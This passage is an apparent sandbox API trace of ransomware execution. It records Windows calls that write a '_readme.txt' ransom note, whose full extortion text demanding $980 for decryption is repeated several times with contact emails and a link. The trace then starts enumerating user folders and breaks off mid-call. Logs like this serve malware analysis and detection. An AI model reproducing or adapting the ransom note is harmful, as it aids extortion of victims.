RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.704] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.704] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.705] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.705] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.705] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.705] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.705] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.705] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.705] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.705] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.705] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.705] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.705] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.705] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.705] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.705] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.705] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.705] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.705] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.705] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.705] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.706] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.706] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.706] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.706] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.706] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.706] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.706] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.706] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.706] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.706] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.706] PathFindFileNameW (pszPath="C:\\Config.Msi\\") returned="Config.Msi\\" [0090.706] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0090.706] PathFindFileNameW (pszPath="") returned="" [0090.706] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0090.707] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0090.707] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0090.708] FreeLibrary (hLibModule=0x75670000) returned 1 [0090.708] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1a8 | out: hHeap=0x680000) returned 1 [0090.708] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0090.708] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef4c8 | out: hHeap=0x680000) returned 1 [0090.708] PathAppendW (in: pszPath="C:\\Config.Msi\\", pMore="_readme.txt" | out: pszPath="C:\\Config.Msi\\_readme.txt") returned 1 [0090.708] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.708] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef4c8 | out: hHeap=0x680000) returned 1 [0090.708] PathFileExistsW (pszPath="C:\\Config.Msi\\_readme.txt") returned 0 [0090.709] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x7d00) returned 0x99f52d8 [0090.709] lstrcpyW (in: lpString1=0x99f52d8, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" [0090.709] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0090.709] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99cad78 [0090.709] CreateFileW (lpFileName="C:\\Config.Msi\\_readme.txt" (normalized: "c:\\config.msi\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0090.710] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0090.710] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x857) returned 0x3189d50 [0090.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x3189d50, cbMultiByte=2135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1112 [0090.710] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x316f0d0 [0090.710] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3189d50 | out: hHeap=0x680000) returned 1 [0090.710] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.710] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1111 [0090.710] WriteFile (in: hFile=0x5cc, lpBuffer=0x316f0d0*, nNumberOfBytesToWrite=0x457, lpNumberOfBytesWritten=0x9ccfb64, lpOverlapped=0x0 | out: lpBuffer=0x316f0d0*, lpNumberOfBytesWritten=0x9ccfb64*=0x457, lpOverlapped=0x0) returned 1 [0090.711] CloseHandle (hObject=0x5cc) returned 1 [0090.711] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316f0d0 | out: hHeap=0x680000) returned 1 [0090.711] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99cad78 | out: hHeap=0x680000) returned 1 [0090.711] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0090.711] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.711] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef4c8 [0090.711] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xa321bbe0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa321bbe0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0090.712] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef4c8 | out: hHeap=0x680000) returned 1 [0090.712] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xa321bbe0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa321bbe0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.712] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa321bbe0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa321bbe0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa321bbe0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0090.712] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa321bbe0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa321bbe0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa321bbe0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0090.712] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0090.712] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.712] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.712] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9c8 | out: hHeap=0x680000) returned 1 [0090.712] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175990 [0090.713] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0090.713] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0090.713] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.713] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.713] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31758b8 | out: hHeap=0x680000) returned 1 [0090.713] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0090.713] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.713] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.713] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31758b8 | out: hHeap=0x680000) returned 1 [0090.713] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0090.713] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.713] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.713] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31758b8 | out: hHeap=0x680000) returned 1 [0090.713] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0090.713] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.713] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.713] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31758b8 | out: hHeap=0x680000) returned 1 [0090.714] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0090.714] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.714] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.714] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31758b8 | out: hHeap=0x680000) returned 1 [0090.714] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0090.714] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.714] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0090.714] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.714] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.714] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0090.714] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.714] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.714] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0090.714] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f100 [0090.714] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.714] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0090.714] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f100 [0090.714] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.714] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0090.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.715] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0090.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.715] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0090.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0090.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.715] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0090.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.715] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0090.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.715] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0090.715] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0090.716] PathFindFileNameW (pszPath="") returned="" [0090.716] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.716] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0090.717] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0090.717] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x800) returned 0x31d1120 [0090.717] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0090.717] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99c9c68 [0090.717] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef4c8 [0090.717] FreeLibrary (hLibModule=0x75670000) returned 1 [0090.717] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef4c8 | out: hHeap=0x680000) returned 1 [0090.717] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0090.717] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1a8 | out: hHeap=0x680000) returned 1 [0090.717] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1a8 [0090.717] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0090.717] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1a8 | out: hHeap=0x680000) returned 1 [0090.717] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, 